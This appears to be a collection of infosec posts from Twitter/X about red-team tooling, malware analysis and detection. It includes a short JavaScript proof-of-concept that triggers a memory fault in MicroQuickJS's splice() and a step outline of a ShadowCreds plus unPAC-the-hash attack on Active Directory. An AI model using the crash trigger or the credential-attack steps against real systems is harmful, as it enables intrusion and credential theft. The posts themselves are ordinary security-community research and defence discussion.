We think of WASM as a mechanism to run compiled code in your browser, but what if we shimmed in all the host APIs necessary to run full implants with ALL logic entirely in the WASM VM? This post walks through what that looks like.
https://t.co/xGVpPe2zyC
#wasm #malware #sliver
In macOS Tahoe 26.4 Apple added a new security feature to Terminal that warns users of potentially malicious pastes with a "Possible malware, Paste blocked" prompt. Here's how it actually works 🧵
@vxunderground With this, bullet-point two leans heavily into bullet-point one.
The (assumed) benefit here being a shipped runtime/FFI that differs with typical PIC/loader behavior.
Coming from the "red teaming" space, it tends to check more boxes for less respective effort.
@maple3142 @RBTree_ This point resonates with my internal thoughts at the moment.
The underpinnings of CTFs were (are?) the excitement of discovery. Throwing in things like a shorter timeline (one day vs. two, etc.), and it's not surprising the path of least resistance is taken.
New blog: Using LLMs the right way for malware analysis
💡Tips for building an autonomous AI analysis lab on a 12 yo laptop and getting stuff done faster without loss of accuracy.
https://t.co/hSd3xwBKGv
@gf_256 @angelroom0 It's always a damned bummer.
Generally speaking, if you all have better aggregated resources akin to https://t.co/QIzQfLpG1l, I'd be very interested.
@b1ack0wl Been following for some time, since about when he was writing a ROP-gadget finder for ARM.
Was just reading the blog on this and FORCEDENTRY, which still hails as the most insane logic implementation I can recall.
@Defte_ Update:
Thanks to @RedTeamPT, I created a pull request for ntlmrelayx to reflect the new requirements:
https://t.co/g42CHDxQdB
Now Shadow Creds are working again 😀
I've tried something new! I have streamed some unfiltered coding, writing a module to detect malicious bytes in a shellcode injection scenario for an EDR that would use the System Call Integrity Layer project: https://t.co/BF2JHEtLPx
If this content is useful, or you like it, please let me know and give me some ideas what you would want to see! I want to grow in myself and help produce content that would be beneficial for our amazing cyber community!
#blueteam #cybersecurity #redteam #driver #rust #rustlang #infosec #rustdriver #soc #cyber #cti #informationsecurity
When MicroQuickJS was released, I spent 8.5 hours summoning an Exploit for it. Here is the Fault:
var arr = new Array(30)
var attack = {
    // valueOf runs when splice() coerces its start argument,
    // after the array length has already been read.
    valueOf: function() {
        arr.length = 0   // shrink the backing storage
        arr.length = 3   // leave the array much shorter than the cached length
        return 10
    }
}
arr.splice(attack, 30)   // triggers the fault described above
I document the full Ritual Process below.
🔥Introducing a new Red Team tool - SessionHop: https://t.co/oU2R60ayPD
SessionHop utilizes the IHxHelpPaneServer COM object to hijack specified user sessions. This session hijacking technique is an alternative to remote process injection or dumping LSASS. Kudos to @tiraniddo for first discovering this years ago.
Blue Team tip: Look for unusual child processes spawning from HelpPane.exe
Reusing part of the ESC1-unPAC BOF code to create a ShadowCreds + unPAC BOF
1. Write msDS-KeyCredentialLink attribute using obfuscated LDAP queries.
2. Authenticate to the KDC using PKINIT.
3. unPAC-the-hash.
4. Cleanup msDS-KeyCredentialLink.
https://t.co/4h4uWgcH4d